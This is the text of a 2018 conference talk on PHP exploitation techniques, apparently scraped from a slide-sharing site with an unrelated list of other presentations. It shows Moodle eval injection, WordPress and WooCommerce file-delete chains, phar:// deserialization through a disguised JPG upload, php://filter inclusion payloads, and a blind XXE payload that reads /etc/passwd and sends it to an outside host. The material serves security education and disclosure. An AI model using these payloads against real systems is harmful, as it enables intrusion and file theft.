new php exploitation techniques
play

New PHP Exploitation Techniques Johannes Dahse, PHP.RUHR 2018 - PowerPoint PPT Presentation

Oct 25, 2023 •479 likes •856 views

New PHP Exploitation Techniques Johannes Dahse, PHP.RUHR 2018 Dortmund, Germany, 08.11.2018 Intro Johannes Dahse Capture The Flag, 5 years Security Consultant, 5 years Developer RIPS open source (2009-2013) Ph.D. Static Code Analysis @

  1. New PHP Exploitation Techniques Johannes Dahse, PHP.RUHR 2018 Dortmund, Germany, 08.11.2018

  2. Intro Johannes Dahse Capture The Flag, 5 years Security Consultant, 5 years Developer RIPS open source (2009-2013) Ph.D. Static Code Analysis @ Ruhr-University Bochum (2013-2016) Co-Founder RIPS Technologies GmbH (since 2016) @FluxReiners blog.ripstech.com

  3. What I love Phar:// Deserialization WooCommerce: File Delete to RCE WordPress: File Delete to RCE Moodle: Code Injection to RCE Prestashop: Object Injection to RCE LimeSurvey: pXSS to File Write to RCE wooCommerce: SQLi to POI to RCE Joomla!: Second-Order SQLi to RCE CubeCart: SQLi to RCE Shopware: POI to XXE to RCE

  4. What I love Phar:// Deserialization WooCommerce: File Delete to RCE WordPress: File Delete to RCE Moodle: Code Injection to RCE Prestashop: Object Injection to RCE LimeSurvey: pXSS to File Write to RCE wooCommerce: SQLi to POI to RCE Joomla!: Second-Order SQLi to RCE CubeCart: SQLi to RCE Shopware: POI to XXE to RCE

  5. Moodle < 3.5.0 Code Injection https://blog.ripstech.com/2018/moodle-remote-code-execution/

  6. Code Injection public function substitute_variables_and_eval($str) { // replace {x} and {y} with numbers like 1.2 $formula = $this->substitute_variables($str); if ($error = find_formula_errors($formula)) { return $error; } eval ( '$str = ' . $formula . ';' ); // $str = exec($_GET[0]); return $str; } function find_formula_errors($formula) { while (preg_match( '~\\{[[:alpha:]][^>} <{"\']*\\}~' , $formula, $regs)) { $formula = str_replace($regs[0], '1' , $formula); } // check formula }

  7. Code Injection public function substitute_variables_and_eval($str) { // replace {x} and {y} with numbers like 1.2 $formula = $this->substitute_variables($str); if ($error = find_formula_errors($formula)) { return $error; } eval ( '$str = ' . $formula . ';' ); return $str; } function find_formula_errors($formula) { while (preg_match( '~\\{[[:alpha:]][^>} <{"\']*\\}~' , $formula, $regs)) { $formula = str_replace($regs[0], '1' , $formula); } // check formula }

  8. Code Injection

  9. WordPress <= 4.9.6 File Delete to RCE https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

  10. Video: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

  11. Comments on Requirements WordPress Author role required, but: Privilege escalation for multi-user sites (e.g. multiple journalists) • New bug announced soon that allows privilege escalation from unauthenticated users •

  12. WooCommerce <= 3.4.5 File Delete Privilege Escalation https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/

  13. WordPress Design Flaw WooCommerce Privileges: A shop manager user gets the edit_users WordPress privilege upon plugin installation • This privilege is permanently stored in the database • This privilege allows to edit all users, including administrators • To restrict this, WooCommerce adds a WordPress filter disallow_editing_of_admins • The Design Flaw: If the WooCommerce plugin gets disabled, the edit_users privilege still persists • But the disallow_editing_of_admins filter of the plugin does not trigger anymore • Usually, only administrators can disable plugins … •

  14. File Delete Vulnerability

  15. Video: https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/

  16. Phar:// Deserialization https://blog.ripstech.com/2018/new-php-exploitation-technique/

  17. PHP Stream Wrappers URL-style wrappers allowed in PHP file operations, e.g. data://, zlib://, php:// Often used for PHP file inclusion: include($_GET["filename"]); ?filename=php://filter/convert.base64-encode/resource=index.php ?filename=data://text/plain;base64,cGhwaW5mbygpCg== What about other wrappers, like phar:// ? Credits: Sam Thomas from Secarma

  18. Phar Files PHP Archive Files Put entire PHP application into single file Meta data is stored in serialized form!

  19. Phar Files PHP Archive Files Put entire PHP application into single file Meta data is stored in serialized form! // create new Phar $phar = new Phar( 'test.phar' ); $phar->startBuffering(); $phar->addFromString( 'test.txt' , 'text' ); $phar->setStub( '<?php __HALT_COMPILER(); ? >' ); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object-> data = 'rips' ; $phar->setMetadata($object); $phar->stopBuffering();

  20. Phar Files PHP Archive Files Put entire PHP application into single file Meta data is stored in serialized form! // create new Phar $phar = new Phar( 'test.phar' ); $phar->startBuffering(); $phar->addFromString( 'test.txt' , 'text' ); $phar->setStub( '<?php __HALT_COMPILER(); ? >' ); // add object of any class as meta data class AnyClass {} $object = new AnyClass; $object-> data = 'rips' ; $phar->setMetadata($object); $phar->stopBuffering();

  21. Phar:// Deserialization Any file operation allows phar:// On access, Phar meta data is unserialize() ‘ d ➔ PHP Object Injection class File { function __destruct() { unlink( $this-> data) ; } } // output: rips include( $_GET[filename] ) ; ?filename=phar://test.phar

  22. Phar:// Deserialization Any file operation allows phar:// On access, Phar meta data is unserialize() ‘ d ➔ PHP Object Injection ➔ Polyglot JPG/PHAR exists class File { function __destruct() { unlink( $this-> data) ; } } // output: rips include( $_GET[filename] ) ; ?filename=phar://test.phar

  23. Phar:// Deserialization Any file operation allows phar:// On access, Phar meta data is unserialize() ‘ d ➔ PHP Object Injection ➔ Polyglot JPG/PHAR exists class File { function __destruct() { 1. Inject serialized object into a phar file unlink( $this-> data) ; 2. Obfuscate phar file as avatar.jpg } } 3. Upload avatar.jpg to application // output: rips include( $_GET[filename] ) ; 4. Exploit phar deserialization: ?filename=phar://test.phar index.php?filename=phar://../uploads/avatar.jpg

  24. Any File Operation include ( 'phar://test.phar' ); file_get_contents ( 'phar://test.phar' ); file_put_contents ( 'phar://test.phar' , '' ); copy ( 'phar://test.phar' , '' );

  25. include ( 'phar://test.phar' ); file_get_contents ( 'phar://test.phar' ); file_put_contents ( 'phar://test.phar' , '' ); copy ( 'phar://test.phar' , '' ); Any file_exists ( 'phar://test.phar' ); is_executable ( 'phar://test.phar' ); is_file ( 'phar://test.phar' ); File is_dir ( 'phar://test.phar' ); is_link ( 'phar://test.phar' ); is_writable ( 'phar://test.phar ‘ ); Operation fileperms ( 'phar://test.phar' ); fileinode ( 'phar://test.phar' ); filesize ( 'phar://test.phar' ); fileowner ( 'phar://test.phar' ); filegroup ( 'phar://test.phar' ); fileatime ( 'phar://test.phar' ); filemtime ( 'phar://test.phar' ); filectime ( 'phar://test.phar' ); filetype ( 'phar://test.phar' ); getimagesize ( 'phar://test.phar' ); exif_read_data ( 'phar://test.phar' ); stat ( 'phar://test.phar' ); lstat ( 'phar://test.phar' ); touch ( 'phar://test.phar ‘ ); md5_file ( 'phar://test.phar' );

  26. Shopware < 5.3.4 PHP Object Instantiation to XXE to RCE https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/

  27. PHP Object Instantiation PHP Object Instantiation != PHP Object Injection class Shopware_Controllers_Backend_ProductStream { public function loadPreviewAction() { $sorting = $this->Request()->getParam( 'sort' ); $streamRepo->unserialize($sorting); } }

  28. PHP Object Instantiation An attacker can instantiate PHP objects of arbitrary classes class LogawareReflectionHelper { public function unserialize($serialized) { foreach ($serialized as $className => $arguments) { $reflectionClass = new \ReflectionClass($className); $classes[] = $reflectionClass->newInstanceArgs($arguments); } } }

  29. PHP Object Instantiation An attacker can instantiate PHP objects of arbitrary classes class LogawareReflectionHelper { public function unserialize($serialized) { foreach ($serialized as $className => $arguments) { $reflectionClass = new \ReflectionClass($className); $classes[] = $reflectionClass->newInstanceArgs($arguments); } } } Invoke __construct(), __destruct(), __call(), but what if no interesting magic methods in code base?

  30. PHP Built-in Class SimpleXMLElement Instantiate object of a PHP built-in class SimpleXMLElement:: __construct ( $data = "https://ripstech.com/xxe.xml" , $options = LIBXML_NOENT , // enable substitution of entities $data_is_url = true )

  31. Blind XXE https://ripstech.com/xxe.xml <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://ripstech.com/xxe.dtd"> %sp; %param1; ]> <r>&exfil;</r> https://ripstech.com/xxe.dtd <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://ripstech.com/?%data;'>">

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented

! Current State of Exploitation ! Return-Oriented Exploitation ! Mac OS X x86 Return-Oriented Exploitation ! Techniques ! Demo ! Mac OS X x86_64 ! Conclusion ! Morris Worm (November 1988) ! Exploited a stack buffer overflow in BSD in.fingerd on VAX

1.02k views • 80 slides
Exploitation techniques for NT kernel Introduction General concepts Internals Adrien

Exploitation techniques for NT kernel Introduction General concepts Internals Adrien

Exploitation techniques for NT kernel Adrien Adr1 Garin Exploitation techniques for NT kernel Introduction General concepts Internals Adrien Adr1 Garin Exploitation Stack overflow Integer overflow Write What Where EPITA

623 views • 47 slides
Weird Machines on Little Robots Intro to binary exploitation on Android smartphones @f0rki

Weird Machines on Little Robots Intro to binary exploitation on Android smartphones @f0rki

Weird Machines on Little Robots Intro to binary exploitation on Android smartphones @f0rki 2013-06-06 Agenda Motivation ARM Primer Exploitation 101 Science, Bitches! Vulnerability classes Exploitation Defenses &amp; Mitigation Techniques

899 views • 51 slides
A Mathematical Model of Exploitation and Mitigation Techniques Using Set Theory STORM STrategic

A Mathematical Model of Exploitation and Mitigation Techniques Using Set Theory STORM STrategic

A Mathematical Model of Exploitation and Mitigation Techniques Using Set Theory STORM STrategic Offensive Research &amp; Mitigations Intel Corporation Rodrigo Branco, Kekai Hu, Henrique Kawakami , and Ke Sun. Motivation One of the most

306 views • 12 slides
Automatic Techniques to Systematically Discover New Heap Exploitation Primitives Ins Insu Yu

Automatic Techniques to Systematically Discover New Heap Exploitation Primitives Ins Insu Yu

Automatic Techniques to Systematically Discover New Heap Exploitation Primitives Ins Insu Yu Yun , Dhaval Kapil, and Taesoo Kim Georgia Institute of Technology 1 Heap vulnerabilities are the most common, yet serious security issues. %

387 views • 34 slides
FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron

FIT5124 Advanced Topics in Security Hacking Techniques III Web Browser Exploitation Ron Steinfeld Clayton School of IT Monash University April 2015 Ron Steinfeld FIT5124 Advanced Topics in SecurityHacking Techniques III Web Browser

2.56k views • 17 slides
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net

Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net

Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript Bypassing browser

1.1k views • 48 slides
Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and

Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and

Kicking Down the Cross Domain Door Techniques for Cross Domain Exploitation Billy K Rios (BK) and Raghav Dube Tabbed Browsing Rich Content Mash-ups Cookies JSON Ajax Implication of Cross Domain Attacks Implication of Cross Domain Attacks

580 views • 31 slides
Combating the Advanced Memory Exploitation Techniques: Detecting ROP with Memory Information Leak

Combating the Advanced Memory Exploitation Techniques: Detecting ROP with Memory Information Leak

Combating the Advanced Memory Exploitation Techniques: Detecting ROP with Memory Information Leak nEINEI, Research Scientist @ McAfee Labs Chong Xu, Director of IPS Research @ McAfee Labs CanSecWest2014 March 20, 2014 Bio nEINEI

546 views • 31 slides
Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview

Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview

Chapter 2 Chapter 2 Instruction-Level Parallelism and Its Exploitation p 1 Overview Instruction level parallelism Dynamic Scheduling Techniques D namic Sched ling Techniq es Scoreboarding Tomasulos Algorithm

611 views • 36 slides
Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview

Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview

Chapter 2 Instruction-Level Parallelism and Its E Exploitation l it ti 1 Overview Instruction level parallelism Dynamic Scheduling Techniques Scoreboarding Tomasulos Algorithm Reducing Branch Cost with Dynamic

507 views • 18 slides
An Introduction to Elder Abuse for Professionals: Financial Exploitation NCEA Financial

An Introduction to Elder Abuse for Professionals: Financial Exploitation NCEA Financial

An Introduction to Elder Abuse for Professionals: Financial Exploitation NCEA Financial Exploitation 1 Learning Objectives At the end of this presentation, you will be able to: Define and describe financial exploitation Identify

386 views • 34 slides
exploitation initiatives Monday, 10 December 2018 Biowaste treatment and exploitation SYMBIOSIS

exploitation initiatives Monday, 10 December 2018 Biowaste treatment and exploitation SYMBIOSIS

CluBE and biowaste exploitation initiatives Monday, 10 December 2018 Biowaste treatment and exploitation SYMBIOSIS Sensitization Event Nikolaos Ntavos Cluster Manager n.ntavos@clube.gr Cluster of Bioenergy &amp; Environment Formally

632 views • 37 slides
Intraday Techniques Intraday Techniques Intraday Techniques Intraday Techniques Combining

Intraday Techniques Intraday Techniques Intraday Techniques Intraday Techniques Combining

Intraday Techniques Intraday Techniques Intraday Techniques Intraday Techniques Combining intraday signals with longer time frame support or resistance. 141 Daily chart for support (slide 1 of 2) June 14 We see a solid band of support

979 views • 20 slides
WiFi Exploitation: How passive interception leads to active exploitation SecTor Canada Solomon

WiFi Exploitation: How passive interception leads to active exploitation SecTor Canada Solomon

WiFi Exploitation: How passive interception leads to active exploitation SecTor Canada Solomon Sonya @Carpenter1010 The problem always seems to become more tractable when presented with the solution Solomon Sonya @Carpenter1010 What to

680 views • 63 slides
CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Exploitation Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Exploitation: Context/Disclaimer In this module

411 views • 37 slides
kinkyreg: Instrument-free inference for linear regression models with endogenous regressors

kinkyreg: Instrument-free inference for linear regression models with endogenous regressors

Introduction KLS inference Example Conclusion kinkyreg: Instrument-free inference for linear regression models with endogenous regressors Sebastian Kripfganz 1 Jan F. Kiviet 2 1 University of Exeter Business School, Department of Economics,

577 views • 28 slides
REMOTE WRITE STORAGE WARS ALEJANDRO CESPEDES WHO AM I? ALEJANDRO CSPEDES Platform

REMOTE WRITE STORAGE WARS ALEJANDRO CESPEDES WHO AM I? ALEJANDRO CSPEDES Platform

REMOTE WRITE STORAGE WARS ALEJANDRO CESPEDES WHO AM I? ALEJANDRO CSPEDES Platform Engineering Technical Monitoring OBSESSED WITH DATA OBSESSED WITH DATA MONITORING LEVELS TECHNICAL BUSINESS APPLY EVERYWHERE A LITTLE BIT OF CONTEXT

297 views • 26 slides
South Indian River Water Control District Public Hearing for the 2018/2019 Budget August 16, 2018

South Indian River Water Control District Public Hearing for the 2018/2019 Budget August 16, 2018

South Indian River Water Control District Public Hearing for the 2018/2019 Budget August 16, 2018 Item 2: Budget Process Illustrated August 16, 2018 Item 2: Initiatives Enhanced initiatives: Driveway Culvert Replacement Program (PBCE &amp;

375 views • 11 slides
Chapter 5 Statistical Models in Simulation Banks, Carson, Nelson &amp; Nicol Discrete-Event

Chapter 5 Statistical Models in Simulation Banks, Carson, Nelson &amp; Nicol Discrete-Event

Chapter 5 Statistical Models in Simulation Banks, Carson, Nelson &amp; Nicol Discrete-Event System Simulation Outlines Discrete distributions Continuous distributions Useful Statistical Models Poisson Process 2 Poisson

582 views • 34 slides
Geo-indistinguishability: A Principled Approach to Location Privacy Kostas Chatzikokolakis CNRS,

Geo-indistinguishability: A Principled Approach to Location Privacy Kostas Chatzikokolakis CNRS,

Geo-indistinguishability: A Principled Approach to Location Privacy Kostas Chatzikokolakis CNRS, INRIA, LIX Ecole Polytechnique joint work with Miguel Andr es, Nicol as Bordenabe, Catuscia Palamidessi, Marco Stronati PRINCESS QIF Day,

478 views • 45 slides
Unpolarized and Polarized Images Youwei Lyu 1* , Zhaopeng Cui 2* , Si Li 1 , Marc Pollefeys 2 ,

Unpolarized and Polarized Images Youwei Lyu 1* , Zhaopeng Cui 2* , Si Li 1 , Marc Pollefeys 2 ,

Reflection Separation using a Pair of Unpolarized and Polarized Images Youwei Lyu 1* , Zhaopeng Cui 2* , Si Li 1 , Marc Pollefeys 2 , Boxin Shi 3,4 1 Beijing University of Posts and Telecommunications, 2 ETH Zrich, 3 Peking University, 4 Peng

638 views • 26 slides
Weakly linked embeddings of complete graphs Christopher Tuffley With Erica Flapan (Pomona) and

Weakly linked embeddings of complete graphs Christopher Tuffley With Erica Flapan (Pomona) and

Weakly linked embeddings of complete graphs Christopher Tuffley With Erica Flapan (Pomona) and Ramin Naimi (Occidental) School of Fundamental Sciences Massey University, New Zealand November 2019 Intrinsic linking Theorem (Conway and Gordon,

773 views • 58 slides
Building an API for Oxford David King - PyCon Sweden Working at the University of Oxford IT

Building an API for Oxford David King - PyCon Sweden Working at the University of Oxford IT

Building an API for Oxford David King - PyCon Sweden Working at the University of Oxford IT Services weve been building an API to aid us in building new applications for the University. Where is Oxford? What does Oxford look like? 40~

777 views • 33 slides

More recommend